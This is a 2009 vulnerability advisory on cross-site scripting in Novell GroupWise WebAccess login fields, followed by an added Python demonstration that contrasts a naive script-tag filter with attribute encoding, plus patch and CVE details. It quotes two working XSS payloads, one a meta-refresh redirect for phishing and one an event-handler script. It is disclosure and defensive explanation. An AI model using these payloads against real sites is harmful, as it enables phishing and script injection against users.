From: swhite_(at)_securestate.com <swhite_(at)_securestate.com>
Date: 21.05.2009
Subject: Novell GroupWise Web Access Multiple XSS

    Novell GroupWise Web Access Multiple XSS
 /============================================\
/~ SecureState R&D Team - leroy and sasquatch ~\
/~  Discovered: 11-24-08, 03-05-09              ~\
\~  Vendor Notified:  01-06-09, 03-05-09        ~/
\~ Vendor Publication:  05-21-09              ~/
 \============================================/


 /------------------------------------------------------------------------------------------------\
/~ Novell's GroupWise WebAccess login page is vulnerable to several cross-site scripting attacks. ~\
/~                                                                                                ~\
<    Example URL: https://www.website.com/gw/webacc                                                >
\~                                                                                                ~/
 \~ An attempt to deter the attack is made in that <script> tags are replaced with <!-- pt>       ~/
  \-----------------------------------------------------------------------------------------------/


|--------------------------------------------------------------|
| Vulnerable Fields: GWAP.version, User.Theme.index, User.lang |
| Vulnerable Versions: 7.0.1, 7.0.3, ?                         |
|--------------------------------------------------------------|
| Vulnerable Fields: User.Lang                                 |
| Vulnerable Versions: 8.0, ?                                  |
|--------------------------------------------------------------|


|------------------------------------------------------------------------------|
| Phishing via URL Redirection:                                                |
| "/><meta http-equiv="refresh" content="0; url=http://www.securestate.com" /> |
|------------------------------------------------------------------------------|
| JavaScript Execution Proof of Concept:                                       |
| " /><div onmouseover="alert('xss')" style="javascript:visibility:visible;">  |
|------------------------------------------------------------------------------|
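Why the mitigation described above does not hold, shown with an added example (this is not code from the advisory, SecureState or Novell): a reconstruction of a filter that rewrites only the literal "<script", beside HTML attribute encoding, with the advisory's two proof-of-concept strings rendered through both and the result parsed to see which extra elements and event handlers a browser would receive. The hidden-input layout and the exact filter behaviour are assumptions.

```python
import html
from html.parser import HTMLParser

# The two proof-of-concept strings quoted in the advisory, embedded as sample input.
PAYLOADS = {
    "phishing_redirect": '"/><meta http-equiv="refresh" content="0; url=http://www.securestate.com" />',
    "js_execution": '" /><div onmouseover="alert(\'xss\')" style="javascript:visibility:visible;">',
}

def naive_filter(value: str) -> str:
    """Assumed reconstruction of the mitigation the advisory describes: only the literal
    '<script' is rewritten to '<!-- pt'; a leading double quote still ends the attribute."""
    return value.replace("<script", "<!-- pt")

def render_field(name: str, value: str, encode: bool) -> str:
    """Render the parameter as a hidden form field (assumed layout; the advisory does not
    show page source). encode=True applies HTML attribute encoding to the whole value."""
    safe = html.escape(value, quote=True) if encode else naive_filter(value)
    return f'<input type="hidden" name="{name}" value="{safe}">'

class _Inspector(HTMLParser):
    """Records every start tag and every on* event-handler attribute in the markup."""
    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)
        self.handlers += [k for k, _ in attrs if k.lower().startswith("on")]

def injected(markup: str) -> tuple[list[str], list[str]]:
    """(tags other than the one expected <input>, event handlers) present in markup.
    Correct encoding gives ([], []); a value that broke out of the attribute gives more."""
    p = _Inspector()
    p.feed(markup)
    p.close()
    return [t for t in p.tags if t != "input"], p.handlers

def compare(name: str = "User.lang") -> dict:
    """Run each PoC string through both renderings and report what the browser would see."""
    return {
        label: {
            "naive": injected(render_field(name, payload, encode=False)),
            "encoded": injected(render_field(name, payload, encode=True)),
        }
        for label, payload in PAYLOADS.items()
    }
```

Calling compare() shows the filtered rendering leaking a meta element and a div with an onmouseover handler, while the encoded rendering yields a single input element in both cases.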


|--------------------------------------------------------------------------------|
| Fix Info -->  Technical Information Document 7003271                           |
|                                                                                |
| http://www.novell.com/support/search.do?usemicrosite=true&searchString=7003271 |
|--------------------------------------------------------------------------------|
| Version 7 --> 7.03 Hot Patch 2                                                 |
| Fixes vulnerable fields: GWAP.version, User.Theme, but not User.lang           |
|--------------------------------------------------------------------------------|
| Version 8 (CVE-2009-1635)                                                      |
|--------------------------------------------------------------------------------|
